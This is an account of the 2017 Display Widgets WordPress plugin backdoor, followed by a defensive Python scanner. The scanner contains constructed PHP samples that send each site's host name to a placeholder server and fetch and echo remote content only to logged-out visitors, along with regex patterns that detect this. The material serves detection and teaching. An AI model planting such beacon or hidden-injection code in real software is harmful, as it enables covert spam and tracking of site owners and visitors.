Quite a few people try to take advantage of other websites in order to send out spam: hiding malicious code inside their plugins, downloading extra “necessary” assets for the plugin to run, and so on. Such is the case with Display Widgets, a WordPress plugin that has more than 200.000 active installs, according to wordpress.org.
So, what really happened? On May 19 2017, after a long thread of negotiations, the plugin was sold to a man named Mason Soiza for the fair amount of $15.000. It is not clear whether his intention from the start was to buy the plugin in order to use it as a backdoor to the 200.000 websites that were using it, but that is what happened.

On June 22nd, an SEO consultant named David Law informed the WordPress team that the plugin was downloading additional code from an external server. This is not allowed for plugins in the WordPress repository, so the next day, June 23rd, the plugin was removed from the repository. On June 30, the second release of the plugin under the new ownership, and the first to include the malicious code, was published to the WordPress repository. This code allowed the owner of the plugin, Soiza, to publish spam content to the infected websites. Worse still, the malicious content was entirely hidden from logged-in users. This means that there was a 99% chance that the website owners had no idea what was happening on their website.

It was David Law again who found that the plugin was logging visits to each website to an external server and reported it to the WordPress team. It is noteworthy that no one had found the hidden malicious code yet. The plugin was removed from the repository for the second time. It was revised and re-uploaded to the repository on July 6th with the malicious code still there and unnoticed; the logging code had been tweaked with an on/off switch, which was off by default.

More than two weeks later, on July 23rd, Calvin Ngan opened a Trac issue on WordPress.org reporting that Display Widgets was posting spam on his website. He found that the malicious code was in a file named geolocation.php. Once again, the plugin was removed from the repository. It was uploaded again on September 2nd with the malicious code still there, and even fixed, since there had been a minor bug in the malicious code! The plugin was deleted from the repository on September 8th for the fourth time, which could actually be considered a record. In the meantime, the original author of the plugin posted on Twitter to warn people about the incident.
We don't have a way of contacting users of our old Display Widgets plugin. But if you are using it you should uninstall immediately. — Formidable Forms (@FormidableForms) September 12, 2017
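The behaviour described in the post (content shown only to logged-out visitors, code pulled from an external server, and a per-visit beacon to a third-party host) is the kind of pattern a simple static check over a plugin's PHP source can flag before a site owner notices spam. The scanner below is an added example, not code from the post or from the plugin itself; the PHP fragments it scans are constructed to imitate that pattern and are not the actual contents of geolocation.php, and the hostname example.invalid is a placeholder.

```python
import re

# Constructed PHP fragments for demonstration; they imitate the behaviours the
# post describes and are NOT the real contents of the plugin's geolocation.php.
BENIGN_PLUGIN = r'''<?php
function dw_render_widget($args) {
    echo '<div class="widget">' . esc_html($args['title']) . '</div>';
}
'''

SUSPICIOUS_PLUGIN = r'''<?php
function dw_geo_init() {
    // beacon: report every front-end visit to a third-party host
    wp_remote_get('http://example.invalid/log.php?host=' . $_SERVER['HTTP_HOST']);
    // hide injected content from anyone who is logged in
    if (!is_user_logged_in()) {
        $payload = file_get_contents('http://example.invalid/content.txt');
        echo $payload;
    }
}
'''

# Each rule is (name, regex). The gated-output rule spans lines via [^}]*.
RULES = [
    ("remote_fetch",
     re.compile(r"(wp_remote_get|wp_remote_post|file_get_contents|curl_init)\s*\(\s*['\"]https?://", re.I)),
    ("logged_out_only_output",
     re.compile(r"if\s*\(\s*!\s*is_user_logged_in\s*\(\s*\)\s*\)\s*\{[^}]*\b(echo|print|eval|include)\b", re.I | re.S)),
    ("host_beacon",
     re.compile(r"https?://[^'\"]+['\"]\s*\.\s*\$_SERVER\s*\[\s*['\"]HTTP_HOST", re.I)),
]

def scan_plugin_source(src: str) -> list[str]:
    """Return the names of the rules that match the given PHP source, in RULES order."""
    return [name for name, rx in RULES if rx.search(src)]

def risk_verdict(hits: list[str]) -> str:
    """Escalate when remote fetching is combined with output shown only to logged-out visitors."""
    if "remote_fetch" in hits and "logged_out_only_output" in hits:
        return "high"
    return "medium" if hits else "clean"

if __name__ == "__main__":
    for label, src in (("benign", BENIGN_PLUGIN), ("suspicious", SUSPICIOUS_PLUGIN)):
        hits = scan_plugin_source(src)
        print(f"{label}: {risk_verdict(hits)} {hits}")
```

Run it over every file under wp-content/plugins to get a triage list; a regex scan is a heuristic, so treat a "high" verdict as a reason to read the file, not as proof on its own.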